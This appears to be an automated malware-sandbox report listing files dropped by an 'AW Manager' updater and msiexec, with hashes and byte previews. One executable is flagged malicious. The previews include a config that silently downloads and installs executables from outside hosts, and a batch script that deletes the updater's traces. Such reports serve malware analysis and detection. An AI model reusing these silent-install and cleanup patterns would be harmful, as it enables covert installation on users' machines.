                                                                                                                                                                                                                                                                        SHA1:A3882001341579D9F2AC17678D2F5EA5AF13BAD1
                                                                                                                                                                                                                                                                        SHA-256:ECC8BCEA44B3BF27C84D448594DF6623BC60D49535FCA10DD0134024A030F30E
                                                                                                                                                                                                                                                                        SHA-512:6C44D4A4DF8CFDA581483591A8F73D5B02AF976A3D561F18082939E00F4F0F02A7BCA418C0B95D20189168645CEC74A1E6B87D640043B2B1A4BCCC5910EB5930
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[v114]..Name=Windows Installer..ServerFileName=v114.exe..State=0..AutoCloseApplication=C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe..Size=4900680..NoGUICommandLineSwitch=/exenoui /qn..Flags=SilentInstall|NoCache|Advertises..SHA256=B0E0AC83D5090C359F84AF160AEBA9BB7317D6D64372E4DEE980C7DC23FEFE41..MD5=5dc644e00d9553fc167cb649087b8089..URL=https://dl.likeasurfer.com/updates/v114.exe..ReleaseDate=00/00/0000..RegistryKey=HKUD\Software\AdvancedWindowsManager\Windows Installer\Version..Version=>= 5.0.4..[v113]..Name=Windows Installer..ServerFileName=v113.exe..State=0..AutoCloseApplication=C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe..Size=3635424..NoGUICommandLineSwitch=/exenoui /qn..Flags=SilentInstall|NoCache|Advertises..MD5=8cad036c5cfed94d5319a060c488e38f..URL=https://dl.likeasurfer.com/updates/v113.exe..ReleaseDate=00/00/0000..RegistryKey=HKUD\Software\AdvancedWindowsManager\Windows Installer\Version..Version=>= 5.0.3..[Gene
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1026936
                                                                                                                                                                                                                                                                        Entropy (8bit):6.391700413941365
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:lViYocX3hU49N1frFMDtpen0qZxVzCdUVdjKFoTo:LiYoM6EODtA0qZadUVdjKFoTo
                                                                                                                                                                                                                                                                        MD5:F95007206C6B2407FB69748EF7C93612
                                                                                                                                                                                                                                                                        SHA1:1B7B10470BCC56823A25274BCC3C4BFBEC76E428
                                                                                                                                                                                                                                                                        SHA-256:85CA1094E52A33019BE8EBEE09C580A31D4CAA846A6BE4412C58796BFC0FAB5A
                                                                                                                                                                                                                                                                        SHA-512:001975689CB431EC8E79D4A90597E8055DABF8E18C769818646BE7BA7708C57192956E0DC43EE3E25DD302F33246DDC226B5D6A660650878A2031B20E1B52752
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..7(.{d(.{d(.{d..xe&.{d..~e..{dJ..e;.{dJ.xe1.{dJ.~eu.{d...e3.{d..}e).{d..ze..{d(.zd..{d..reU.{d...d).{d..ye).{dRich(.{d........PE..L.....gb.........."..............................@.......................................@.....................................,.......4>..............x....0.......:..p...................@;..........@...............t...<........................text...o........................... ..`.rdata..2...........................@..@.data...D)..........................@....rsrc...4>.......@..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                        Entropy (8bit):3.73923251766526
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:QjUd4z1MO1Ua6d4z1MO1UAfN+LeUflPUBGLkbLdv+YIOw64uG:td82OOd82OzMeUQFbRv/I7v
                                                                                                                                                                                                                                                                        MD5:2F60103BA9C4EEBE15A109ABE57939CC
                                                                                                                                                                                                                                                                        SHA1:D58B68E3F7298FB8EE6F9B743C9124649029C7A9
                                                                                                                                                                                                                                                                        SHA-256:7CAAE15F33A6DAAA6ABB272F13A899ADF0DEDA6C80CE0AAB546C95326B79E923
                                                                                                                                                                                                                                                                        SHA-512:2335E5090CA0E5DBCE85C41EA7A51E220EE455AD282BC28FC1C410A1EC955CF797993C8D5A8CC692BDE368B8A9F39196DEB65FAF86CC8D79BA6D0D1E595D4056
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......[.G.e.n.e.r.a.l.].....R.e.a.l.U.p.d.a.t.e.r.P.a.t.h.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.W. .M.a.n.a.g.e.r.\.W.i.n.d.o.w.s. .M.a.n.a.g.e.r.\.W.i.n.d.o.w.s. .U.p.d.a.t.e.r...e.x.e.....C.l.i.e.n.t.C.o.n.f.i.g.P.a.t.h.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.W. .M.a.n.a.g.e.r.\.W.i.n.d.o.w.s. .M.a.n.a.g.e.r.\.W.i.n.d.o.w.s. .U.p.d.a.t.e.r...i.n.i.....S.e.r.v.e.r.C.o.n.f.i.g.P.a.t.h.=.C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.c.e.2.d.3.1.3.3.9.c.f.f.f.4.1.b.4.b.6.d.b.9.e.3.2.e.9.3.2.1.8.c.\.W.i.n.d.o.w.s. .U.p.d.a.t.e.r...d.a.t.....U.R.L.=.h.t.t.p.s.:././.a.l.l.r.o.a.d.s.l.i.m.i.t...c.o.m./.u.p.d.a.t.e.s...t.x.t.....r.e.s.t.a.r.t.a.p.p.=.....r.e.s.t.a.r.t.a.p.p.c.m.d.=.....N.o.G.U.I.=.t.r.u.e.....U.n.i.n.s.t.a.l.l.F.i.l.e.P.a.t.h.=.C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.{.F.D.B.C.5.8.7.5.-.B.B.A.4.-.4.D.A.5.-.9.0.4.8.-.A.1.9.6.A.2.1.F.E.4.9.A.}.....b.a.t.....
                                                                                                                                                                                                                                                                        Process:C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5038592
                                                                                                                                                                                                                                                                        Entropy (8bit):6.043058205786219
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                                                                                                                                                                        MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                                                                                                                                                                        SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                                                                                                                                                                        SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                                                                                                                                                                        SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4509696
                                                                                                                                                                                                                                                                        Entropy (8bit):6.100941182830929
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                                                                                                                                                                                                                                                                        MD5:F6153E803F1533042AC7E6988237C2C3
                                                                                                                                                                                                                                                                        SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                                                                                                                                                                                                                                                                        SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                                                                                                                                                                                                                                                                        SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):83128
                                                                                                                                                                                                                                                                        Entropy (8bit):6.654653670108596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                                                                                                                                                                                                                                                                        MD5:125B0F6BF378358E4F9C837FF6682D94
                                                                                                                                                                                                                                                                        SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                                                                                                                                                                                                                                                                        SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                                                                                                                                                                                                                                                                        SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4509696
                                                                                                                                                                                                                                                                        Entropy (8bit):6.100941182830929
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                                                                                                                                                                                                                                                                        MD5:F6153E803F1533042AC7E6988237C2C3
                                                                                                                                                                                                                                                                        SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                                                                                                                                                                                                                                                                        SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                                                                                                                                                                                                                                                                        SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):83128
                                                                                                                                                                                                                                                                        Entropy (8bit):6.654653670108596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                                                                                                                                                                                                                                                                        MD5:125B0F6BF378358E4F9C837FF6682D94
                                                                                                                                                                                                                                                                        SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                                                                                                                                                                                                                                                                        SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                                                                                                                                                                                                                                                                        SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4509696
                                                                                                                                                                                                                                                                        Entropy (8bit):6.100941182830929
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:jm+XAVAMPLfOyim8iTRxYUOQSfLTZZZ2y38lb7Cjn3mboy4+MT7ujWx/Tl0ng48e:CzVAwiKTOpfLTDQyaNoy787ujWx/TlR
                                                                                                                                                                                                                                                                        MD5:F6153E803F1533042AC7E6988237C2C3
                                                                                                                                                                                                                                                                        SHA1:DDA81BB8BC8CC14877C9CB9B7C664DEFD81EBB4F
                                                                                                                                                                                                                                                                        SHA-256:F42A771D310C762C05A5BE3DE0CFDB9BEC28D3DFCCAEF800C901F551A0DF30ED
                                                                                                                                                                                                                                                                        SHA-512:7AE76A4CB58A9929C09B1D6376073268622C74B1E3F0C346AFA7A7829E2EF136CCF091F58CCA28BFE83C665573C23D9DB6AF51A44275DA0CC2CF8C1306ADDBAC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._..V.X.=..K..S..K..X..K..W.._.....K..^..K..-..K..D..K.4.^..K..^..Rich_..........................PE..L....+.X...........!.....dA.........P.3.......A....c.........................@E.......E...@A.........................i@.K&..L.A.......B.H.....................D..-......T....................O...... .................A.H....C@......................text.....@.......@................. ..`.wpp_sf.......@.......@............. ..`.data....6....A......hA.............@....idata...1....A..2...nA.............@..@.didat..4.....B.......A.............@....rsrc...H.....B.......A.............@..@.reloc...-....D.......C.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):83128
                                                                                                                                                                                                                                                                        Entropy (8bit):6.654653670108596
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:0jIdYoF2CwmzOVStYMAuNWrmaTk++ouMOczT0ud4x41xmPS:0jRoFZwmr+bDk/MOcv0G4sxm
                                                                                                                                                                                                                                                                        MD5:125B0F6BF378358E4F9C837FF6682D94
                                                                                                                                                                                                                                                                        SHA1:8715BEB626E0F4BD79A14819CC0F90B81A2E58AD
                                                                                                                                                                                                                                                                        SHA-256:E99EAB3C75989B519F7F828373042701329ACBD8CEADF4F3FF390F346AC76193
                                                                                                                                                                                                                                                                        SHA-512:B63BB6BFDA70D42472868B5A1D3951CF9B2E00A7FADB08C1F599151A1801A19F5A75CFC3ACE94C952CFD284EB261C7D6F11BE0EBBCAA701B75036D3A6B442DB2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.T...:...:...:.....&.:...9...:...;...:...;...:...:...:...4...:...?...:......:...>...:......:...8...:.Rich..:.................PE..L...Y.............!.........H.......n..............................................;.....@A........................P........B.......`............... ...$...p..........T............................................@...............................text.../........................... ..`.data....!..........................@....idata..H....@......................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):577
                                                                                                                                                                                                                                                                        Entropy (8bit):5.203592632567303
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:h9BRebN8cxjT4FvKBRebN8cxjT4GLRPRebN8cxjT493Ui1RebN8cxjT4/zmmRebW:OUpjIyIM+vpKTdwbUP
                                                                                                                                                                                                                                                                        MD5:B35B8352FA3F8DE71B90AD1A2FE8FC0E
                                                                                                                                                                                                                                                                        SHA1:6B103AA0F7620FB2A25A578D2E66F4CF9F35647B
                                                                                                                                                                                                                                                                        SHA-256:1CDD342FAAC0264037C64F01520EACB682F04E080719485633195FE5EE8903F8
                                                                                                                                                                                                                                                                        SHA-512:392EA4F5C03D9B12AB683B7871B9669EB16F644AAD7B60A48CE0E2C70F8FBD202046EFFC4FC1E1558BEA6C4A5480781B7042FEE73F3BDEDDD6B5AD2796ABBF80
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:@echo off ..del "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.ini" ..del "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.dat" ..:again ..if not exist "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" goto end ..if exist "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" del "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" ..goto again ..:end ..rmDir "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c" ..del "C:\Windows\TEMP\{FDBC5875-BBA4-4DA5-9048-A196A21FE49A}..bat" | cls
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                        Entropy (8bit):1.3000890348998706
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:jpAlTL8eWacUF6C+fjfXfuf9fXiRCgeif8fvMfWco2WG8ifSfrufP:FAlfKay3nxeifuFG8ifsO
                                                                                                                                                                                                                                                                        MD5:2C16834BCDCF760B7F886F644C2C4DAF
                                                                                                                                                                                                                                                                        SHA1:70FC454427DED72B6F7FCFF29C8D2E7658F9EFAB
                                                                                                                                                                                                                                                                        SHA-256:D4AD49E2AE02C28B508A74ED453E66FAF40E4AC4A8C0F44F29DC8786E9D9F527
                                                                                                                                                                                                                                                                        SHA-512:7FBB24160C9CFFF7E3CF5D77237E61F5C68E21270EE2DEC05015B669A973AAB3CF46D01A6B84E28F0CB6F87DF3B293A8FCCD6CC70E8CAF272A9A27CCBD77D759
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                        Entropy (8bit):0.13490900276357704
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:O110i8n0itFzDHFqeY7w0ZobdoZVB+ZWt/:q6F0mlMB7waEdo
                                                                                                                                                                                                                                                                        MD5:DD0D6D5A94B2B6DDDD3B485BAD2C41C5
                                                                                                                                                                                                                                                                        SHA1:35E6E590EA589392E89CBA01DEFDDC3A90D5C859
                                                                                                                                                                                                                                                                        SHA-256:F6512EF0CBDC9FE9ACC237A17E48B28C97D37DD93FDFC8D0593DAFDFBD70E3A9
                                                                                                                                                                                                                                                                        SHA-512:DD60C58685CB0DFB58B9AC479250DD7BC16114B4AA31489945CB03F4D9A29383321D962D9FD2D936B36D20C681701A5E58C022A1F158375E0B754C5D90CB3F99
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                        Entropy (8bit):1.302877082190169
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:gpAlTL8e7acUdffjfnuf9fqRCgyCf2Mfoco2WGQfrfrufx:WAlf3aDPxyZFGQfXw
                                                                                                                                                                                                                                                                        MD5:B2B028592AF32EEFE75B918E6B3A2481
                                                                                                                                                                                                                                                                        SHA1:DBA71C50BD3248DDB67BC2085D087A4D62839926
                                                                                                                                                                                                                                                                        SHA-256:F047C41ED4F3346FAF589D75C9D6136C2C6E1B3D9A5B5776B4FB87073B586C1E
                                                                                                                                                                                                                                                                        SHA-512:DDB7A38C4CE289E5834F83DF165047A3CD608F3A9A49D4F61BE668A45A49E9CE0D32FA368B3BD5C36B1D5706CAD9C7CA2C944B196F99E95614B7B2BEAD833509
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                        Entropy (8bit):1.3000890348998706
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:jpAlTL8eWacUF6C+fjfXfuf9fXiRCgeif8fvMfWco2WG8ifSfrufP:FAlfKay3nxeifuFG8ifsO
                                                                                                                                                                                                                                                                        MD5:2C16834BCDCF760B7F886F644C2C4DAF
                                                                                                                                                                                                                                                                        SHA1:70FC454427DED72B6F7FCFF29C8D2E7658F9EFAB
                                                                                                                                                                                                                                                                        SHA-256:D4AD49E2AE02C28B508A74ED453E66FAF40E4AC4A8C0F44F29DC8786E9D9F527
                                                                                                                                                                                                                                                                        SHA-512:7FBB24160C9CFFF7E3CF5D77237E61F5C68E21270EE2DEC05015B669A973AAB3CF46D01A6B84E28F0CB6F87DF3B293A8FCCD6CC70E8CAF272A9A27CCBD77D759
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                        Entropy (8bit):1.2996385317858776
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:rmAtBTL8Bfj1KdQ5EsfAcufJRCzyoUDco2WGufrufnRCz6Tf:rVtBfEFEgW/DFGYMZf
                                                                                                                                                                                                                                                                        MD5:6993136A01273BD387742F45040B216C
                                                                                                                                                                                                                                                                        SHA1:531D9733B94189EB47986E961E465719D04C4425
                                                                                                                                                                                                                                                                        SHA-256:56569D153E4454675A4D0D7899ABDE2B51D6AC1121A71EA10BC864C9B4279B94
                                                                                                                                                                                                                                                                        SHA-512:DA0C9D7C61F2BD64C3D0696E257A6259B956E3F803BC112BF88D195E1502AC99B8C6E136DE3DC90BECB2A287760E1DAFB39033A5F1148A7AE6E14CA010C1CF38
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                        Entropy (8bit):1.2398122763011443
                                                                                                                                                                                                                                                                        Encrypted:false
